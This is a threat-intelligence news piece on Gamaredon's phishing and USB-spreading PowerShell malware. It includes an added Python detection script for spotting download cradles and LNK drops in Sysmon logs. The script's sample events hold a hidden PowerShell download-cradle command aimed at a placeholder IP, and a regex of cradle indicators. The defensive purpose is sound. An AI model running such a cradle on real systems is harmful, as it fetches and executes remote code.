Gamaredon utilises PowerShell USB malware to launch backdoors

July 24, 2023
Gamaredon PowerShell USB Malware Backdoors Phishing

Gamaredon, a Russian state-sponsored threat group, has continued infecting critical organisations in Ukraine’s security and military sector by employing new toolsets and infection tactics.

Based on reports, the threat actors have started deploying USB malware strains to propagate to other systems inside compromised networks. Moreover, the Russian threat group’s new strategy targets the HR departments of the organisations it compromises. This detail implies that the attackers want to spread spear-phishing attacks within the infected organisations.


2023 has been a busy year for the Gamaredon group.


Researchers said the Gamaredon group’s activity increased between February and March this year. The group maintained its presence on some of the compromised devices until last month.

The group continues to rely on phishing emails to start its attacks. Its target selection has remained the same: it focuses only on compromising government entities, such as military, security, and research organisations.

The researchers also noticed that the group’s phishing emails carry HTA, LNK, SFX, DOCX, and RAR attachments. Once a target opens one of these attachments, it launches a PowerShell command that downloads a payload from an attacker-controlled C2 server.

A separate researcher studied 25 variants of the new PowerShell scripts, which use varying levels of obfuscation and point to different Pterodo download IP addresses to evade static detection.

Next, the PowerShell script copies itself onto the compromised device and creates a shortcut file with an .lnk extension. The LNK files the script creates carry various names, some chosen specifically to pique the victims’ curiosity.

Lastly, once the victim launches the files, the PowerShell script enumerates all drives on the computer and copies itself to any removable USB disk it finds. This tactic increases the attackers’ chances of moving laterally within the breached network.
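The chain above (a phishing attachment spawning a PowerShell download cradle, then the script writing LNK files to removable drives) leaves two observable traces in endpoint telemetry. The following is an added example, not code from the article or from the researchers it cites: a small hunting routine run over constructed Sysmon-style records (EventID 1 process creation, EventID 11 file creation). The field names, the indicator list, the sample command lines and the 203.0.113.10 address are all assumptions made for illustration; in particular, Sysmon does not record drive type, so "any drive letter other than C:" stands in for "removable".

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (EventID 1 = process create, 11 = file create).
# Illustrative records only, not telemetry from the incidents in the article.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c "
                    "\"(New-Object Net.WebClient).DownloadString('http://203.0.113.10/p')\""},
    {"EventID": 11, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"E:\photos.lnk"},
    {"EventID": 11, "Computer": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"E:\documents.lnk"},
    {"EventID": 1, "Computer": "WS02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"EventID": 11, "Computer": "WS02",
     "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\bob\Desktop\report.lnk"},
]

# Script hosts that typically spawn PowerShell when an HTA/LNK/Office attachment is opened.
SCRIPT_HOST_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe", "winword.exe", "cmd.exe"}

# Assumed indicator list for a PowerShell download cradle; extend with your own telemetry.
CRADLE_PATTERNS = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|-enc|frombase64string",
    re.IGNORECASE,
)

# Heuristic (assumption): a .lnk written to the root of any non-system drive letter.
NON_SYSTEM_DRIVE_LNK = re.compile(r"^[D-Zd-z]:\\[^\\]+\.lnk$")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_download_cradle(event: dict) -> bool:
    """Process-create event: PowerShell launched by a script host or carrying download indicators."""
    if event.get("EventID") != 1 or basename(event.get("Image", "")) != "powershell.exe":
        return False
    parent_is_script_host = basename(event.get("ParentImage", "")) in SCRIPT_HOST_PARENTS
    return parent_is_script_host or bool(CRADLE_PATTERNS.search(event.get("CommandLine", "")))


def is_lnk_drop_on_removable(event: dict) -> bool:
    """File-create event: PowerShell writing a .lnk to the root of a non-system drive."""
    if event.get("EventID") != 11 or basename(event.get("Image", "")) != "powershell.exe":
        return False
    return bool(NON_SYSTEM_DRIVE_LNK.match(event.get("TargetFilename", "")))


def hunt(events) -> dict:
    """Return {computer: finding} for hosts showing either behaviour; both together scores high."""
    cradles = defaultdict(list)
    lnk_drops = defaultdict(list)
    for ev in events:
        host = ev.get("Computer", "?")
        if is_download_cradle(ev):
            cradles[host].append(ev["CommandLine"])
        elif is_lnk_drop_on_removable(ev):
            lnk_drops[host].append(ev["TargetFilename"])
    findings = {}
    for host in set(cradles) | set(lnk_drops):
        # A cradle followed by LNK drops on a non-system drive is the USB-propagation pattern.
        severity = "high" if host in cradles and host in lnk_drops else "medium"
        findings[host] = {"severity": severity,
                          "cradles": cradles.get(host, []),
                          "lnk_drops": lnk_drops.get(host, [])}
    return findings


if __name__ == "__main__":
    for host, finding in sorted(hunt(SAMPLE_EVENTS).items()):
        print(host, finding["severity"], finding["cradles"], finding["lnk_drops"])
```

On the constructed sample, WS01 is flagged high (script-host parent plus download indicators, then two LNK files written to E:\), while WS02's scheduled backup script and the user's desktop shortcut produce no finding. In a real deployment the drive-letter heuristic should be replaced with removable-media events (for example, the Windows Partition/DiskDiagnostic or USB device-install logs correlated by timestamp), and the indicator list tuned against the environment's legitimate PowerShell usage.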

Cybersecurity experts expect the Russian state-sponsored Gamaredon group to remain focused on targeting Ukraine as long as the geopolitical conflict does not end. Furthermore, the group has been refreshing its TTPs while targeting information that could benefit the Russian military forces.

Ukrainian organisations, primarily government entities, should be cautious when handling emails, since this threat group relies on spear-phishing emails to gain initial access.
